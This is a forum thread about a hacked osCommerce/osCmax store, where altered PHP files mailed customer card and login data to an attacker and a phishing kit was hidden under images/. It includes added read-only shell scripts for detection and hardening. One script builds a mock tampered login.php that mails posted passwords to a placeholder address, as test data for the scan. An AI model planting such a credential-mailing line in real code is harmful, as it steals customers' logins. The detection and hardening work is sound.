
Website Recently Hacked

This is a discussion on Website Recently Hacked within the osCmax v2 Customization/Mods forums, part of the osCmax v2.0 Forums category.

      
  1. #11
    osCMax Developer

    michael_s's Avatar
    Join Date
    Jul 2002
    Location
    Phoenix, AZ
    Posts
    19,907
    Rep Power
    568


    Re: Website Recently Hacked

    Before clicking submit, Select All (ctrl-a) and Copy (ctrl-c). If anything goes wrong, simply create a new reply, and Paste your whole post in one shot (ctrl-v).

    I always do this before hitting submit on long posts, just in case something goes wacky.
    Michael Sasek
    osCMax Developer


    osCmax Installation Service
    - Have our professionals install osCmax on your server - same day service!
    osCmax 2.5 User Manual - the must have beginners guide to osCmax v2.5

    Stay Up To Date with everything osCMax:
    Free osCmax Newsletters - Security notices, New Releases, osCMax News
    osCmax on Twitter - Up to the minute info as it happens. Know it first.

    osCmax Documentation

  2. #12
    osCMax Testing Team wkdwich's Avatar
    Join Date
    Jul 2007
    Posts
    307
    Rep Power
    11


    Re: Website Recently Hacked

    Before clicking submit, Select All (ctrl-a) and Copy (ctrl-c). If anything goes wrong, simply create a new reply, and Paste your whole post in one shot (ctrl-v).
    Yea yea I know better.. been there done that but hubby was whining to eat.. and now he'll whine some more

    OK so let's try this again. Hubby is waiting on dinner now because I really need to rewrite all that

    Four things..

    #1. Change your password from a different computer/connection - if you have a keylogger, no matter how many times you change it they will get it

    #2. Do not ever save passwords in any browser, email or FTP program

    #3. If you have control over your server, turn off FTP and only use SFTP

    #4. Install KeyScrambler, a free utility that will scramble input of forms and password/user name boxes etc. in MSIE, FF and others

    A client whose osc is hosted on a shared box got hacked, very similar to what you are describing. This site does not take credit cards, only PayPal.. but the customer can put their credit card info in at PP when they get there.. so there is no storing of any CC info at his osc site.. HOWEVER.. and I have seen this at my own osc install.. when a person chooses PP and does not have a PP account -- the CC# only -- no exp date or CVV# -- will show in the osc control panel and therefore also stored in the DB

    My theory is that PP is transmitting the CC info back to the osc cart when the customer pays.. the hacked php files read it from maybe the temp file that is created in wherever you've set it to in the IPN module.. or simply intercepted the response from the PP IPN.. PP MUST be sending the CC info back for it to be written to the order file.. the customer never typed it into the osc cart checkout screens..

    I dug deep into the clients hosting account and found files altered just as you described.. all sending information to a master_email address:
    tell_a_friend.php, login.php, index.php, create_account.php, checkout_confirmation.php

    I also found inside his catalog/images folder a new folder catalog/images/gpx LOADED with folders named with bank names.. within each were several images and a tasty php file -- the site was being used as a phishing site!!

    I had a little bit of a hard time trashing those folders.. I had to manually navigate to this gpx folder with wsFTP pro to remove them.

    I checked the mail/new folder (this is a cpanel box) and found several mails there.. this client does not have any email account set up with his hosting, he still uses AOL for everything.. so the mails sit and never get checked at all there.. I grabbed them and looked.. now here is the curious thing.. 2 of them with exact time stamps of a particular order - paid using PP - were in there.. these were both bounce notices.. this customer's info and I mean ALL his info.. CC#, exp date, CVV # DOB, name, address.. EVERYTHING was attempting to be sent to a now closed gmail account -- not the master_email address I saw in the other files.. Date: Tue, 31 Mar 2009 15:32:18 -0700 My client called this customer and asked him my questions.. when he got to PP, he has a PP account, so he logged in and simply chose which CC associated with his account he wanted to use for this purchase. He did NOT type his CC info into PP at this time.

    This particular osc install has always had an issue with the PP IPN never responding to OSC properly.. he gets a "PayPal IPN Invalid Process" email with every order. I do not think this is related to the hack though because you did not mention having any issue like that.

    The site is running osCMAX_RC3_0_2 fully patched..

    Michael.. I have all the files if you want to see them.. I have crappy logs from the shared box so I have no clue who or even when they got in..

    I changed his password from here.. he is installing KeyScrambler on every computer in his home and office as we type..

    IMHO this was a fairly sophisticated and elaborate mechanism that gathered all the info it needed very quietly..

    I will be installing SiteMonitor V 1.7 on all my osc installs ASAP
    I am sure I am missing some tid-bit from my lost post.. if it comes to mind I'll be back..


    (CTRL+A -- CTRL+C)
    Debbie D
    NY & VA
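The post above describes three things found on the compromised account: storefront PHP files (login.php, create_account.php, checkout_confirmation.php ...) altered to mail data to a hard-coded address, a phishing kit dropped under catalog/images/gpx, and nothing useful in the host's logs. The following script is an added, read-only triage scan for exactly those symptoms; it is not code from the thread or from osCmax. It builds its own small sample web root (constructed here, with a placeholder address) so it runs offline, reports hits, and deletes nothing.

```shell
#!/bin/sh
# Added example (not from the thread or osCmax): a read-only triage of an
# osCommerce/osCmax web root for the symptoms described in the post:
#   1. PHP files sitting under an images/ directory (where a phishing kit hides)
#   2. storefront PHP files that call mail() - each hit needs a human look
#   3. files modified in the last N days, for building a timeline
# Nothing here modifies the tree.

# Constructed sample tree standing in for a real catalog/ directory.
make_sample_webroot() {
    root=$(mktemp -d)
    mkdir -p "$root/catalog/images/gpx/somebank" "$root/catalog/includes"
    # clean storefront file
    printf '<?php\n// product listing\necho "hello";\n' > "$root/catalog/index.php"
    # tampered login page: mails submitted credentials to a hard-coded
    # address (placeholder, constructed for this example)
    printf '<?php\n$master_email = "collector@example.invalid";\nmail($master_email, "login", $_POST["email_address"] . ":" . $_POST["password"]);\n' \
        > "$root/catalog/login.php"
    # phishing kit dropped under images/: a php file next to bank logos
    printf '<?php\n// fake bank login page\n' > "$root/catalog/images/gpx/somebank/index.php"
    printf 'GIF89a' > "$root/catalog/images/gpx/somebank/logo.gif"
    echo "$root"
}

# 1. PHP files anywhere below a directory named images/
php_under_images() {
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' \) \
        -path '*/images/*' 2>/dev/null | sort
}

# 2. PHP files that call mail(); legitimate stores do this in a few known
#    places (order confirmation, tell-a-friend), so compare against a clean copy
php_calling_mail() {
    grep -rl --include='*.php' -E '(^|[^a-zA-Z_])mail[[:space:]]*\(' "$1" 2>/dev/null | sort
}

# 3. files changed within the last N days (default 7)
recently_modified() {
    days=${2:-7}
    find "$1" -type f -mtime "-$days" 2>/dev/null | sort
}

# Human-readable report over a web root
triage_report() {
    echo "== PHP under images/ =="; php_under_images "$1"
    echo "== PHP calling mail() =="; php_calling_mail "$1"
    echo "== modified in last ${2:-7} days =="; recently_modified "$1" "$2"
}

# Stand-alone run against the constructed tree:
# r=$(make_sample_webroot); triage_report "$r"; rm -rf "$r"
```

Run it against a copy of the hosting account (or the live tree, since it only reads) and compare the mail() list with a clean osCmax distribution of the same version; anything under images/ that ends in .php is worth quarantining before deciding.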

  3. #13
    osCMax Developer

    michael_s's Avatar
    Join Date
    Jul 2002
    Location
    Phoenix, AZ
    Posts
    19,907
    Rep Power
    568


    Re: Website Recently Hacked

    First I want to be clear about this: if using the paypal module, the credit card number is never collected by osCMax, and is never sent back to the cart from paypal. If your cart is collecting CC#'s and storing in the database, the method is not Paypal IPN for the checkout for that order. The module has no facility for entering or storing a cc#. You may want to make sure your paypal module is not also compromised.

    Next, I run a lot of osCMax stores and a lot of servers and have personally seen several different hacks on shops. Most of the time, the security hole was elsewhere, not the osCMax application itself.

    The first rule: Never use a simple password. It should be 12-15 characters/numbers/symbols at minimum.

    Second rule: Never allow public access to your admin panel. A simple .htaccess file can lock out all IP addresses but yours. If your IP changes, SFTP or FTPES to the account and update the .htaccess file with your new IP. There is simply no reason to allow public access to the admin panel - ever.

    Third Rule: never use plain text ftp. Always SFTP or preferably FTPES from a limited user account. Sending un-encrypted credentials is a very easy way to get hacked.

    Fourth rule: Always keep file permissions very limited. That means 444 for all php files. 755 or 744 for most directories.

    If your host setup requires 777 on folders/files that need to be writable - move to a different host. Seriously. That means they are running PHP as an apache module. That is extremely insecure on a shared server. Basically your account can be written to by any other user account on the server with that setup.

    Good security practices are very important and an ongoing thing.
    Michael Sasek
    osCMax Developer
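The second and fourth rules in the post above (admin panel locked to your own IP via .htaccess, 444 on PHP files, 755 on directories, never 777) can be applied with a few lines of shell. The script below is an added example, not code from the thread or from osCmax; the paths and the two IP addresses are placeholders chosen for the example, and the .htaccess uses the Apache 2.2 Order/Deny/Allow syntax that shared hosts of that era ran.

```shell
#!/bin/sh
# Added example (not from the thread or osCmax): apply the .htaccess IP
# allowlist and the 444/755 permission scheme described above, and audit
# the tree for anything still world-writable.

# Write admin/.htaccess denying everyone except the IPs passed as arguments.
# Usage: write_admin_htaccess /path/to/catalog/admin 203.0.113.10 198.51.100.7
# (Apache 2.2 syntax; on 2.4 the equivalent is "Require ip ...")
write_admin_htaccess() {
    admin_dir=$1; shift
    {
        echo 'Order Deny,Allow'
        echo 'Deny from all'
        for ip in "$@"; do
            echo "Allow from $ip"
        done
    } > "$admin_dir/.htaccess"
}

# 755 on every directory, 444 on every PHP file (owner cannot write either,
# so a file must be chmod'ed back before editing - that is the point).
# Directories the store must write to (images upload, cache) are a per-install
# decision and are deliberately not special-cased here.
harden_permissions() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -name '*.php' -exec chmod 444 {} +
}

# Audit: list anything world-writable, i.e. the 777 the post warns about.
world_writable() {
    find "$1" -perm -0002 2>/dev/null | sort
}

# Stand-alone run against a constructed tree:
# r=$(mktemp -d); mkdir -p "$r/catalog/admin" "$r/catalog/images"
# chmod 777 "$r/catalog/images"; write_admin_htaccess "$r/catalog/admin" 203.0.113.10
# world_writable "$r"; harden_permissions "$r"; world_writable "$r"; rm -rf "$r"
```

Run world_writable first to see what the host's setup has left open, then harden_permissions; if the store stops working afterwards because PHP could not write somewhere, that is the directory to open up individually rather than reverting to 777 across the board.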

  4. #14
    osCMax Testing Team wkdwich's Avatar
    Join Date
    Jul 2007
    Posts
    307
    Rep Power
    11


    Re: Website Recently Hacked

    Michael..

    I agree.. security is deeply important.. and I know his passwords were not great, they are now and while he kicked and carried on I said it stays..

    Yea he's on a shared.. and I know this is a base issue..

    OK now the paypal_ipn.. he and I run the same module.. his reacts differently than mine.. he does not have any other payment module set except money order/check.. so he has no credit card module installed.. only paypal.. I never installed the CVV modification because he doesn't take payment that way and (this may be on a slight tangent) the invalid IPN emails/notice might have something to do with that..

    In my own cart I have had people tell me they chose credit card but were sent to paypal.. my people are not the brightest lights when it comes to computers so I always just wrote it off as to problems behind the keyboard..

    I know my own server has not been attacked with any success in over 2 years.. attempts daily.. but no luck..

    (sorry if I am jumping around a bit..)

    If they chose PP as checkout method, and went to paypal.. they had no opportunity to enter credit card info into the osc checkout screens, yet I'd say maybe 10% or more of all paypal payment method payments, I see the FULL CC number there in my store.. so how did it get there?? Is it possible they chose credit card filled it in, clicked continue then some how went back and now choose PP.. think that might be how it happens??

    I actually had one girl from Puerto Rico who chose PP, went there and never completed the payment .. something like 6 times.. each time indeed the order record showed the full CC number but no exp date or CVV info

    So with all that said.. please point me to the proper CC and PP modules and I need the CVV modification also..

    I was going to add the CVV modification to this particular client's install not because he needs it, but because it will allow him to click and remove the CC info if it shows up.. I did go into his DB this afternoon and in almost 3000 orders there were 39 that had the full CC info there.. I should have paid more attention to the dates of those orders before I removed the data though..

    I know that you have released the new version.. I need to one at a time upgrade.. does the new version have the CVV and delete CC info modification??
    Debbie D
    NY & VA

  5. #15
    osCMax Developer

    michael_s's Avatar
    Join Date
    Jul 2002
    Location
    Phoenix, AZ
    Posts
    19,907
    Rep Power
    568


    Re: Website Recently Hacked

    There is no need for a CVV mod if you are using paypal. It is all handled by paypal.

    If you are using the sample credit card module that is included in osCMax, stop using it. It is not intended to be used on a real site, and only for testing. You should never use it.

    Any order that stores the cc# in the db was not paid via the paypal module, at least not the standard paypal ipn that comes with osCMax.
    Michael Sasek
    osCMax Developer

  6. #16
    osCMax Testing Team wkdwich's Avatar
    Join Date
    Jul 2007
    Posts
    307
    Rep Power
    11


    Re: Website Recently Hacked

    OK gotcha.. would you be a dear and please point me to or email me priv the current paypal_ipn module??

    My client does not have the CC module installed at all and I do use it on my site.
    Debbie D
    NY & VA

  7. #17
    osCMax Developer

    michael_s's Avatar
    Join Date
    Jul 2002
    Location
    Phoenix, AZ
    Posts
    19,907
    Rep Power
    568


    Re: Website Recently Hacked

    Michael Sasek
    osCMax Developer

  8. #18
    osCMax Testing Team wkdwich's Avatar
    Join Date
    Jul 2007
    Posts
    307
    Rep Power
    11


    Re: Website Recently Hacked

    Michael.. just to be sure.. I believe this version (possibly not the latest release - but this version) was the one that was not deducting coupons?? I'm not sure now.. but I remember back I think it was Sept or so, when PP?? made some changes and the IPN stopped working?? I'm having trouble digging the facts out of my brain.. but somehow I was not getting coupons deducted.. I recall though using the IPN posted to the coupons and discounts contribution and that fixed that issue... Can I assume this particular IPN PayPal IPN Module 2.3.4.7 that you linked to will deduct the coupons??
    Debbie D
    NY & VA

  9. #19
    osCMax Testing Team wkdwich's Avatar
    Join Date
    Jul 2007
    Posts
    307
    Rep Power
    11


    Re: Website Recently Hacked

    Michael.. the PP IPN is still not working for me.. I know this is the wrong thread.. do you want me to open a new thread?
    Debbie D
    NY & VA

  10. #20
    Lurker
    Join Date
    Apr 2009
    Posts
    1
    Rep Power
    0


    Re: Website Recently Hacked

    Your site is infected!!

    Take a backup of the database, get your site reset, then reinstall the whole site.
    Your URL posted here is redirecting users.
